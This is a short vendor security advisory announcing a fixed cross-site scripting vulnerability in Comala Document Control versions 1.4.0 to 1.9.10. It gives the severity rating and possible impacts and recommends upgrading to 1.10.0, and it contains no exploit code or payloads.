This advisory discloses a security vulnerability found and fixed in Comala Document Control. We recommend upgrading Comala Document Control to the latest supported version.
The vulnerability affects Comala Document Control 1.4.0 → 1.9.10
The 1.10.0 release contains a fix for the issue mentioned below.
Versions prior to 1.4.0 are not affected.
Comalatech rates the severity of these issues as Medium according to the published Atlassian Security Levels. We have ranked the vulnerability as medium because:
- A registered user with edit permissions over pages or blog posts in the application could do the following:
- Session riding
- Stealing information and cookies
- Creating a phishing page within the domain
This is an independent assessment and you should evaluate its applicability to your own IT environment.
We have fixed a cross-site scripting vulnerability introduced in Comala Document Control 1.4.0. The vulnerability could allow a user with page level workflow usage permissions to use another user's session.
Sites running 1.4.0-1.9.10 are recommend to upgrade to Comala Document Control 1.10.0
If upgrading immediately is not possible please disable the application until you can upgrade it.